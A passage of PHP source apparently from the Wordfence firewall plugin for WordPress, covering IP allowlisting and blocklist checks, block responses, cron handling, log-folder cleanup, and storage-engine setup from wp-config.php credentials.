return preg_match('/^(?:\:(?:\:0{1,4}){0,4}\:|(?:0{1,4}\:){5})ffff\:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/i', $ip) > 0;
}
/**
* @param string $addr Should be in dot or colon notation (127.0.0.1 or ::1)
* @return bool
*/
private function _isPrivateIP($ip) {
// Run this through the preset list for IPv4 addresses.
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
$wordfenceLib = realpath(dirname(__FILE__) . '/../lib');
include($wordfenceLib . '/wfIPWhitelist.php'); // defines $wfIPWhitelist
$private = $wfIPWhitelist['private'];
foreach ($private as $a) {
if (wfWAFUtils::subnetContainsIP($a, $ip)) {
return true;
}
}
}
return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 | FILTER_FLAG_IPV6) !== false
&& filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 | FILTER_FLAG_IPV6 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}
}
class wfWAFWordPressObserver extends wfWAFBaseObserver {
private $waf;
public function __construct($waf){
$this->waf=$waf;
}
public function beforeRunRules() {
// Whitelisted URLs (in WAF config)
$whitelistedURLs = wfWAF::getInstance()->getStorageEngine()->getConfig('whitelistedURLs', null, 'livewaf');
if ($whitelistedURLs) {
$whitelistPattern = "";
foreach ($whitelistedURLs as $whitelistedURL) {
$whitelistPattern .= preg_replace('/\\\\\*/', '.*?', preg_quote($whitelistedURL, '/')) . '|';
}
$whitelistPattern = '/^(?:' . wfWAFUtils::substr($whitelistPattern, 0, -1) . ')$/i';
wfWAFRule::create(wfWAF::getInstance(), 0x8000000, 'rule', 'whitelist', 0, 'User Supplied Allowlisted URL', 'allow',
new wfWAFRuleComparisonGroup(
new wfWAFRuleComparison(wfWAF::getInstance(), 'match', $whitelistPattern, array(
'request.uri',
))
)
)->evaluate();
}
// Whitelisted IPs (Wordfence config)
$whitelistedIPs = wfWAF::getInstance()->getStorageEngine()->getConfig('whitelistedIPs', null, 'synced');
if ($whitelistedIPs) {
if (!is_array($whitelistedIPs)) {
$whitelistedIPs = explode(',', $whitelistedIPs);
}
foreach ($whitelistedIPs as $whitelistedIP) {
$ipRange = new wfWAFUserIPRange($whitelistedIP);
if ($ipRange->isIPInRange(wfWAF::getInstance()->getRequest()->getIP())) {
throw new wfWAFAllowException('Wordfence allowlisted IP.');
}
}
}
// Check plugin blocking
if ($result = wfWAF::getInstance()->willPerformFinalAction(wfWAF::getInstance()->getRequest())) {
if ($result === true) { $result = 'Not available'; } // Should not happen but can if the reason in the blocks table is empty
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('finalAction' => $result)));
}
}
public function afterRunRules()
{
//Blacklist
if (!wfWAF::getInstance()->getStorageEngine()->getConfig('disableWAFBlacklistBlocking')) {
$blockedPrefixes = wfWAF::getInstance()->getStorageEngine()->getConfig('blockedPrefixes', null, 'transient');
if ($blockedPrefixes && wfWAF::getInstance()->getStorageEngine()->getConfig('isPaid', null, 'synced')) {
$blockedPrefixes = base64_decode($blockedPrefixes);
if ($this->_prefixListContainsIP($blockedPrefixes, wfWAF::getInstance()->getRequest()->getIP()) !== false) {
$allowedCacheJSON = wfWAF::getInstance()->getStorageEngine()->getConfig('blacklistAllowedCache', '', 'transient');
$allowedCache = @json_decode($allowedCacheJSON, true);
if (!is_array($allowedCache)) {
$allowedCache = array();
}
$cacheTest = base64_encode(wfWAFUtils::inet_pton(wfWAF::getInstance()->getRequest()->getIP()));
if (!in_array($cacheTest, $allowedCache)) {
$guessSiteURL = sprintf('%s://%s/', wfWAF::getInstance()->getRequest()->getProtocol(), wfWAF::getInstance()->getRequest()->getHost());
try {
$request = new wfWAFHTTP();
$response = wfWAFHTTP::get(WFWAF_API_URL_SEC . "?" . http_build_query(array(
'action' => 'is_ip_blacklisted',
'ip' => wfWAF::getInstance()->getRequest()->getIP(),
'k' => wfWAF::getInstance()->getStorageEngine()->getConfig('apiKey', null, 'synced'),
's' => wfWAF::getInstance()->getStorageEngine()->getConfig('siteURL', null, 'synced') ? wfWAF::getInstance()->getStorageEngine()->getConfig('siteURL', null, 'synced') : $guessSiteURL,
'h' => wfWAF::getInstance()->getStorageEngine()->getConfig('homeURL', null, 'synced') ? wfWAF::getInstance()->getStorageEngine()->getConfig('homeURL', null, 'synced') : $guessSiteURL,
't' => microtime(true),
'lang' => wfWAF::getInstance()->getStorageEngine()->getConfig('WPLANG', null, 'synced'),
), '', '&'), $request);
if ($response instanceof wfWAFHTTPResponse && $response->getBody()) {
$jsonData = wfWAFUtils::json_decode($response->getBody(), true);
if (is_array($jsonData) && array_key_exists('data', $jsonData)) {
if (preg_match('/^block:(\d+)$/i', $jsonData['data'], $matches)) {
wfWAF::getInstance()->getStorageEngine()->blockIP((int)$matches[1] + time(), wfWAF::getInstance()->getRequest()->getIP(), wfWAFStorageInterface::IP_BLOCKS_BLACKLIST);
$e = new wfWAFBlockException();
$e->setFailedRules(array('blocked'));
$e->setRequest(wfWAF::getInstance()->getRequest());
throw $e;
}
else { //Allowed, cache until the next prefix list refresh
$allowedCache[] = $cacheTest;
wfWAF::getInstance()->getStorageEngine()->setConfig('blacklistAllowedCache', json_encode($allowedCache), 'transient');
}
}
}
} catch (wfWAFHTTPTransportException $e) {
error_log($e->getMessage());
}
}
}
}
}
$watchedIPs = wfWAF::getInstance()->getStorageEngine()->getConfig('watchedIPs', null, 'transient');
if ($watchedIPs) {
if (!is_array($watchedIPs)) {
$watchedIPs = explode(',', $watchedIPs);
}
foreach ($watchedIPs as $watchedIP) {
$ipRange = new wfWAFUserIPRange($watchedIP);
if ($ipRange->isIPInRange(wfWAF::getInstance()->getRequest()->getIP())) {
$this->waf->recordLogEvent(new wfWAFLogEvent());
}
}
}
if ($reason = wfWAF::getInstance()->getRequest()->getMetadata('finalAction')) {
$e = new wfWAFBlockException($reason['action']);
$e->setRequest(wfWAF::getInstance()->getRequest());
throw $e;
}
}
private function _prefixListContainsIP($prefixList, $ip) {
$size = ord(wfWAFUtils::substr($prefixList, 0, 1));
$sha256 = hash('sha256', wfWAFUtils::inet_pton($ip), true);
$p = wfWAFUtils::substr($sha256, 0, $size);
$count = ceil((wfWAFUtils::strlen($prefixList) - 1) / $size);
$low = 0;
$high = $count - 1;
while ($low <= $high) {
$mid = (int) (($high + $low) / 2);
$val = wfWAFUtils::substr($prefixList, 1 + $mid * $size, $size);
$cmp = strcmp($val, $p);
if ($cmp < 0) {
$low = $mid + 1;
}
else if ($cmp > 0) {
$high = $mid - 1;
}
else {
return $mid;
}
}
return false;
}
}
/**
*
*/
class wfWAFWordPress extends wfWAF {
/** @var wfWAFRunException */
private $learningModeAttackException;
/**
* @param wfWAFBlockException $e
* @param int $httpCode
*/
public function blockAction($e, $httpCode = 403, $redirect = false, $template = null) {
$failedRules = $e->getFailedRules();
if (!is_array($failedRules)) {
$failedRules = array();
}
if ($this->isInLearningMode() && !$e->getRequest()->getMetadata('finalAction') && !in_array('blocked', $failedRules)) {
register_shutdown_function(array(
$this, 'whitelistFailedRulesIfNot404',
));
$this->getStorageEngine()->logAttack($e->getFailedRules(), $e->getParamKey(), $e->getParamValue(), $e->getRequest());
$this->setLearningModeAttackException($e);
} else {
if (empty($failedRules)) {
$finalAction = $e->getRequest()->getMetadata('finalAction');
if (is_array($finalAction)) {
$isLockedOut = isset($finalAction['lockout']) && $finalAction['lockout'];
$finalAction = $finalAction['action'];
if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_REDIR) {
$redirect = wfWAFIPBlocksController::currentController()->countryRedirURL();
}
else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_BYPASS_REDIR) {
$redirect = wfWAFIPBlocksController::currentController()->countryBypassRedirURL();
}
else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_UAREFIPRANGE) {
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Advanced blocking in effect.', '503Time' => 3600)));
$httpCode = 503;
}
else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY) {
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Access from your area has been temporarily limited for security reasons.', '503Time' => 3600)));
$httpCode = 503;
}
else if (is_string($finalAction) && strlen($finalAction) > 0) {
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => $finalAction, '503Time' => 3600)));
$httpCode = 503;
if ($isLockedOut) {
parent::blockAction($e, $httpCode, $redirect, '503-lockout'); //exits
}
}
}
}
else if (array_search('blocked', $failedRules) !== false) {
parent::blockAction($e, $httpCode, $redirect, '403-blacklist'); //exits
}
parent::blockAction($e, $httpCode, $redirect, $template);
}
}
/**
* @param wfWAFBlockXSSException $e
* @param int $httpCode
*/
public function blockXSSAction($e, $httpCode = 403, $redirect = false) {
if ($this->isInLearningMode() && !$e->getRequest()->getMetadata('finalAction')) {
register_shutdown_function(array(
$this, 'whitelistFailedRulesIfNot404',
));
$this->getStorageEngine()->logAttack($e->getFailedRules(), $e->getParamKey(), $e->getParamValue(), $e->getRequest());
$this->setLearningModeAttackException($e);
} else {
$failedRules = $e->getFailedRules();
if (empty($failedRules)) {
$finalAction = $e->getRequest()->getMetadata('finalAction');
if (is_array($finalAction)) {
$finalAction = $finalAction['action'];
if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_REDIR) {
$redirect = wfWAFIPBlocksController::currentController()->countryRedirURL();
}
else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_BYPASS_REDIR) {
$redirect = wfWAFIPBlocksController::currentController()->countryBypassRedirURL();
}
else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_UAREFIPRANGE) {
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Advanced blocking in effect.', '503Time' => 3600)));
$httpCode = 503;
}
else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY) {
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Access from your area has been temporarily limited for security reasons.', '503Time' => 3600)));
$httpCode = 503;
}
else if (is_string($finalAction) && strlen($finalAction) > 0) {
wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => $finalAction, '503Time' => 3600)));
$httpCode = 503;
}
}
}
parent::blockXSSAction($e, $httpCode, $redirect);
}
}
private function isCli() {
return (php_sapi_name()==='cli') || !array_key_exists('REQUEST_METHOD', $_SERVER);
}
/**
*
*/
public function runCron() {
if($this->isCli()){
return;
}
/**
* Removed sending attack data. Attack data is sent in @see wordfence::veryFirstAction
*/
$storage = $this->getStorageEngine();
$cron = (array) $storage->getConfig('cron', null, 'livewaf');
$run = array();
$updated = false;
if (is_array($cron)) {
/** @var wfWAFCronEvent $event */
$cronDeduplication = array();
foreach ($cron as $index => $event) {
if (is_object($event) && $event instanceof wfWAFCronEvent) {
$event->setWaf($this);
if ($event->isInPast()) {
$run[$index] = $event;
$newEvent = $event->reschedule();
$className = get_class($newEvent);
if ($newEvent instanceof wfWAFCronEvent && $newEvent !== $event && !in_array($className, $cronDeduplication)) {
$cron[$index] = $newEvent;
$cronDeduplication[] = $className;
$updated = true;
} else {
unset($cron[$index]);
$updated = true;
}
}
else {
$className = get_class($event);
if (in_array($className, $cronDeduplication)) {
unset($cron[$index]);
$updated = true;
}
else {
$cronDeduplication[] = $className;
}
}
}
else { //Remove bad/corrupt records
unset($cron[$index]);
$updated = true;
}
}
}
$storage->setConfig('cron', $cron, 'livewaf');
if ($updated && method_exists($storage, 'saveConfig')) {
$storage->saveConfig('livewaf');
}
foreach ($run as $index => $event) {
$event->fire();
}
}
/**
*
*/
public function whitelistFailedRulesIfNot404() {
/** @var WP_Query $wp_query */
global $wp_query;
if (defined('ABSPATH') &&
isset($wp_query) && class_exists('WP_Query') && $wp_query instanceof WP_Query &&
method_exists($wp_query, 'is_404') && $wp_query->is_404() &&
function_exists('is_admin') && !is_admin()) {
return;
}
$this->whitelistFailedRules();
}
/**
* @param $ip
* @return mixed
*/
public function isIPBlocked($ip) {
return parent::isIPBlocked($ip);
}
/**
* @param wfWAFRequest $request
* @return bool|string false if it should not be blocked, otherwise true or a reason for blocking
*/
public function willPerformFinalAction($request) {
try {
$disableWAFIPBlocking = $this->getStorageEngine()->getConfig('disableWAFIPBlocking', null, 'synced');
$advancedBlockingEnabled = $this->getStorageEngine()->getConfig('advancedBlockingEnabled', null, 'synced');
}
catch (Exception $e) {
return false;
}
if ($disableWAFIPBlocking || !$advancedBlockingEnabled) {
return false;
}
return wfWAFIPBlocksController::currentController()->shouldBlockRequest($request);
}
public function uninstall() {
parent::uninstall();
@unlink(rtrim(WFWAF_LOG_PATH, '/') . '/.htaccess');
@unlink(rtrim(WFWAF_LOG_PATH, '/') . '/template.php');
@unlink(rtrim(WFWAF_LOG_PATH, '/') . '/GeoLite2-Country.mmdb');
self::_recursivelyRemoveWflogs(''); //Removes any remaining files and the directory itself
}
/**
* Removes a path within wflogs, recursing as necessary.
*
* @param string $file
* @param array $processedDirs
* @return array The list of removed files/folders.
*/
private static function _recursivelyRemoveWflogs($file, $processedDirs = array()) {
if (preg_match('~(?:^|/|\\\\)\.\.(?:/|\\\\|$)~', $file)) {
return array();
}
if (stripos(WFWAF_LOG_PATH, 'wflogs') === false) { //Sanity check -- if not in a wflogs folder, user will have to do removal manually
return array();
}
$path = rtrim(WFWAF_LOG_PATH, '/') . '/' . $file;
if (is_link($path)) {
if (@unlink($path)) {
return array($file);
}
return array();
}
if (is_dir($path)) {
$real = realpath($file);
if (in_array($real, $processedDirs)) {
return array();
}
$processedDirs[] = $real;
$count = 0;
$dir = opendir($path);
if ($dir) {
$contents = array();
while ($sub = readdir($dir)) {
if ($sub == '.' || $sub == '..') { continue; }
$contents[] = $sub;
}
closedir($dir);
$filesRemoved = array();
foreach ($contents as $f) {
$removed = self::_recursivelyRemoveWflogs($file . '/' . $f, $processedDirs);
$filesRemoved = array($filesRemoved, $removed);
}
}
if (@rmdir($path)) {
$filesRemoved[] = $file;
}
return $filesRemoved;
}
if (@unlink($path)) {
return array($file);
}
return array();
}
public function fileList() {
$fileList = parent::fileList();
$fileList[] = rtrim(WFWAF_LOG_PATH, '/') . '/.htaccess';
$fileList[] = rtrim(WFWAF_LOG_PATH, '/') . '/template.php';
$fileList[] = rtrim(WFWAF_LOG_PATH, '/') . '/GeoLite2-Country.mmdb';
return $fileList;
}
/**
* @return wfWAFRunException
*/
public function getLearningModeAttackException() {
return $this->learningModeAttackException;
}
/**
* @param wfWAFRunException $learningModeAttackException
*/
public function setLearningModeAttackException($learningModeAttackException) {
$this->learningModeAttackException = $learningModeAttackException;
}
public static function permissions() {
if (defined('WFWAF_LOG_FILE_MODE')) {
return WFWAF_LOG_FILE_MODE;
}
if (class_exists('wfWAFStorageFile') && method_exists('wfWAFStorageFile', 'permissions')) {
return wfWAFStorageFile::permissions();
}
static $_cachedPermissions = null;
if ($_cachedPermissions === null) {
if (defined('WFWAF_LOG_PATH')) {
$template = rtrim(WFWAF_LOG_PATH . '/') . '/template.php';
if (file_exists($template)) {
$stat = @stat($template);
if ($stat !== false) {
$mode = $stat[2];
$updatedMode = 0600;
if (($mode & 0020) == 0020) {
$updatedMode = $updatedMode | 0060;
}
$_cachedPermissions = $updatedMode;
return $updatedMode;
}
}
}
return 0660;
}
return $_cachedPermissions;
}
public static function writeHtaccess() {
@file_put_contents(rtrim(WFWAF_LOG_PATH, '/') . '/.htaccess', <<<APACHE
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
APACHE
);
@chmod(rtrim(WFWAF_LOG_PATH, '/') . '/.htaccess', (wfWAFWordPress::permissions() | 0444));
}
public function getGlobal($global) {
if (wfWAFUtils::strpos($global, '.') === false) {
return null;
}
list($prefix, $_global) = explode('.', $global);
switch ($prefix) {
case 'wordpress':
if ($_global === 'core') {
return $this->getStorageEngine()->getConfig('wordpressVersion', null, 'synced');
} else if ($_global === 'plugins') {
return $this->getStorageEngine()->getConfig('wordpressPluginVersions', null, 'synced');
} else if ($_global === 'themes') {
return $this->getStorageEngine()->getConfig('wordpressThemeVersions', null, 'synced');
}
break;
}
return parent::getGlobal($global);
}
}
class wfWAFWordPressStorageMySQL extends wfWAFStorageMySQL {
public function getSerializedParams() {
$params = parent::getSerializedParams();
$params[] = 'wordpressPluginVersions';
$params[] = 'wordpressThemeVersions';
return $params;
}
public function getAutoloadParams() {
$params = parent::getAutoloadParams();
$params['synced'][] = 'wordpressVersion';
$params['synced'][] = 'wordpressPluginVersions';
$params['synced'][] = 'wordpressThemeVersions';
return $params;
}
}
class wfWAFWordPressI18n implements wfWAFI18nEngine {
protected $translations;
/** @var wfWAFStorageInterface */
private $storageEngine;
/**
* @var wfMO
*/
private $mo;
/**
* @param wfWAFStorageInterface $storageEngine
*/
public function __construct($storageEngine) {
$this->storageEngine = $storageEngine;
$this->loadTranslations();
}
/**
* @param string $text
* @return string
*/
public function __($text) {
if (!$this->storageEngine->getConfig('wordfenceI18n', true, 'synced')) {
return $text;
}
if ($this->mo) {
$translated = $this->mo->translate($text);
if ($translated) {
return $translated;
}
}
return $text;
}
protected function loadTranslations() {
require_once dirname(__FILE__) . '/pomo/mo.php';
$currentLocale = $this->storageEngine->getConfig('WPLANG', '', 'synced');
// Find translation file for the current language.
$mofile = dirname(__FILE__) . '/../languages/wordfence-' . $currentLocale . '.mo';
if (!file_exists($mofile)) {
// No translation, use the default
$mofile = dirname(__FILE__) . '/../languages/wordfence.mo';
}
$this->mo = new wfMO();
return $this->mo->import_from_file( $mofile );
}
}
try {
if (!defined('WFWAF_LOG_PATH')) {
if (!defined('WP_CONTENT_DIR')) { //Loading before WordPress
exit();
}
define('WFWAF_LOG_PATH', WP_CONTENT_DIR . '/wflogs/');
}
if (!is_dir(WFWAF_LOG_PATH)) {
@mkdir(WFWAF_LOG_PATH, (wfWAFWordPress::permissions() | 0755));
@chmod(WFWAF_LOG_PATH, (wfWAFWordPress::permissions() | 0755));
wfWAFWordPress::writeHtaccess();
}
try {
if (!defined('WFWAF_STORAGE_ENGINE') && isset($_SERVER['WFWAF_STORAGE_ENGINE'])) {
define('WFWAF_STORAGE_ENGINE', $_SERVER['WFWAF_STORAGE_ENGINE']);
}
else if (!defined('WFWAF_STORAGE_ENGINE') && (WF_IS_WP_ENGINE || WF_IS_FLYWHEEL)) {
define('WFWAF_STORAGE_ENGINE', 'mysqli');
}
$specifiedStorageEngine = defined('WFWAF_STORAGE_ENGINE');
$fallbackStorageEngine = false;
if ($specifiedStorageEngine) {
switch (WFWAF_STORAGE_ENGINE) {
case 'mysqli':
$wfWAFDBCredentials = array();
$sslOptions = array();
$overrideConstants = array(
'wfWAFDBCredentials' => array(
'WFWAF_DB_NAME' => 'database',
'WFWAF_DB_USER' => 'user',
'WFWAF_DB_PASSWORD' => 'pass',
'WFWAF_DB_HOST' => 'host',
'WFWAF_DB_CHARSET' => 'charset',
'WFWAF_DB_COLLATE' => 'collation',
'WFWAF_MYSQL_CLIENT_FLAGS' => 'flags',
'WFWAF_TABLE_PREFIX' => 'tablePrefix'
),
'sslOptions' => array(
'WFWAF_DB_SSL_KEY' => 'key',
'WFWAF_DB_SSL_CERTIFICATE' => 'certificate',
'WFWAF_DB_SSL_CA_CERTIFICATE' => 'ca_certificate',
'WFWAF_DB_SSL_CA_PATH' => 'ca_path',
'WFWAF_DB_SSL_CIPHER_ALGOS' => 'cipher_algos'
)
);
foreach ($overrideConstants as $variable => $constants) {
foreach ($constants as $constant => $key) {
if (defined($constant)) {
${$variable}[$key] = constant($constant);
}
}
}
// Find the wp-config.php
if (is_dir(dirname(WFWAF_LOG_PATH))) {
if (file_exists(dirname(WFWAF_LOG_PATH) . '/../wp-config.php')) {
wfWAFUtils::extractCredentialsWPConfig(dirname(WFWAF_LOG_PATH) . '/../wp-config.php', $wfWAFDBCredentials);
} else if (file_exists(dirname(WFWAF_LOG_PATH) . '/../../wp-config.php')) {
wfWAFUtils::extractCredentialsWPConfig(dirname(WFWAF_LOG_PATH) . '/../../wp-config.php', $wfWAFDBCredentials);
}
} else if (!empty($_SERVER['DOCUMENT_ROOT'])) {
if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/wp-config.php')) {
wfWAFUtils::extractCredentialsWPConfig($_SERVER['DOCUMENT_ROOT'] . '/wp-config.php', $wfWAFDBCredentials);
} else if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/../wp-config.php')) {
wfWAFUtils::extractCredentialsWPConfig($_SERVER['DOCUMENT_ROOT'] . '/../wp-config.php', $wfWAFDBCredentials);
}
} else {
$wfWAFDBCredentials = false;
}
if (!empty($wfWAFDBCredentials)) {
$wfWAFStorageEngine = new wfWAFWordPressStorageMySQL(new wfWAFStorageEngineMySQLi(), $wfWAFDBCredentials['tablePrefix'], wfShutdownRegistry::getDefaultInstance());
$wfWAFStorageEngine->getDb()->connect(
$wfWAFDBCredentials['user'],
$wfWAFDBCredentials['pass'],
$wfWAFDBCredentials['database'],
!empty($wfWAFDBCredentials['ipv6']) ? '[' . $wfWAFDBCredentials['host'] . ']' : $wfWAFDBCredentials['host'],
!empty($wfWAFDBCredentials['port']) ? $wfWAFDBCredentials['port'] : null,
!empty($wfWAFDBCredentials['socket']) ? $wfWAFDBCredentials['socket'] : null,
array_key_exists('flags', $wfWAFDBCredentials) ? $wfWAFDBCredentials['flags'] : 0,
$sslOptions
);
if (array_key_exists('charset', $wfWAFDBCredentials)) {
$wfWAFStorageEngine->getDb()
->setCharset($wfWAFDBCredentials['charset'],
!empty($wfWAFDBCredentials['collation']) ? $wfWAFDBCredentials['collation'] : '');
}
if (defined('ABSPATH')) {
$tableExists = false;
$optionName = 'wordfence_installed'; //Also exists in wfConfig.php
if (is_multisite() && function_exists('get_network_option')) {
$tableExists = get_network_option(null, $optionName, null);
}
else {
$tableExists = get_option($optionName, null);
}
$wfWAFStorageEngine->installing = !$tableExists;
$wfWAFStorageEngine->getDb()->installing = $wfWAFStorageEngine->installing;
}
} else {
unset($wfWAFDBCredentials);
}
break;
}
}
if (empty($wfWAFStorageEngine)) {
$wfWAFStorageEngine = new wfWAFStorageFile(
WFWAF_LOG_PATH . 'attack-data.php',
WFWAF_LOG_PATH . 'ips.php',
WFWAF_LOG_PATH . 'config.php',
WFWAF_LOG_PATH . 'rules.php',
WFWAF_LOG_PATH . 'wafRules.rules'
);
if ($specifiedStorageEngine)
$fallbackStorageEngine = true;
}
wfWAF::setSharedStorageEngine($wfWAFStorageEngine, $fallbackStorageEngine);
wfWAF::setInstance(new wfWAFWordPress(wfWAFWordPressRequest::createFromGlobals(), wfWAF::getSharedStorageEngine()));
wfWAF::getInstance()->getEventBus()->attach(new wfWAFWordPressObserver(wfWAF::getInstance()));
if ($wfWAFStorageEngine instanceof wfWAFStorageFile) {
$rulesFiles = array(
WFWAF_LOG_PATH . 'rules.php',
// WFWAF_PATH . 'rules.php',
);
foreach ($rulesFiles as $rulesFile) {
if (!file_exists($rulesFile) && !wfWAF::getInstance()->isReadOnly()) {
@touch($rulesFile);
}
@chmod($rulesFile, (wfWAFWordPress::permissions() | 0444));
if (is_writable($rulesFile)) {
wfWAF::getInstance()->setCompiledRulesFile($rulesFile);
break;
}
}
} else if ($wfWAFStorageEngine instanceof wfWAFStorageMySQL) {
$wfWAFStorageEngine->runMigrations();
$wfWAFStorageEngine->setDefaults();
}
if (!wfWAF::getInstance()->isReadOnly()) {
if (wfWAF::getInstance()->getStorageEngine()->needsInitialRules()) {
try {
if (wfWAF::getInstance()->getStorageEngine()->getConfig('apiKey', null, 'synced') !== null &&
wfWAF::getInstance()->getStorageEngine()->getConfig('createInitialRulesDelay', null, 'transient') < time()
) {
$event = new wfWAFCronFetchRulesEvent(time() - 60);
$event->setWaf(wfWAF::getInstance());
$event->fire();
wfWAF::getInstance()->getStorageEngine()->setConfig('createInitialRulesDelay', time() + (5 * 60), 'transient');
}
} catch (wfWAFBuildRulesException $e) {
// Log this somewhere
error_log($e->getMessage());
} catch (Exception $e) {
// Suppress this
error_log($e->getMessage());
}
}
}
if (WFWAF_DEBUG && file_exists(wfWAF::getInstance()->getStorageEngine()->getRulesDSLCacheFile())) {
try {
wfWAF::getInstance()->updateRuleSet(file_get_contents(wfWAF::getInstance()->getStorageEngine()->getRulesDSLCacheFile()), false);
} catch (wfWAFBuildRulesException $e) {
$GLOBALS['wfWAFDebugBuildException'] = $e;
} catch (Exception $e) {
$GLOBALS['wfWAFDebugBuildException'] = $e;
}
}
wfWAFI18n::setInstance(new wfWAFI18n(new wfWAFWordPressI18n($wfWAFStorageEngine)));
try {
wfWAF::getInstance()->run();
} catch (wfWAFBuildRulesException $e) {
// Log this
error_log($e->getMessage());
}
} catch (wfWAFStorageFileConfigException $e) {
// Let this request through for now
error_log($e->getMessage());
} catch (wfWAFStorageEngineMySQLiException $e) {
// Let this request through for now
error_log($e->getMessage());
} catch (wfWAFStorageFileException $e) {
// We need to choose another storage engine here.
}
}
catch (Exception $e) { // In PHP 5, Throwable does not exist
error_log("An unexpected exception occurred during WAF execution: {$e}");
$wf_waf_failure = array(
'throwable' => $e
);
}
catch (Throwable $t) {
error_log("An unexpected exception occurred during WAF execution: {$t}");
if (class_exists('ParseError') && $t instanceof ParseError) {
//Do nothing
}
else {
$wf_waf_failure = array(
'throwable' => $t
);
}
}
if (wfWAF::getInstance() === null) {
require_once __DIR__ . '/dummy.php';
wfWAF::setInstance(new wfDummyWaf());
}
define('WFWAF_RUN_COMPLETE', true);
}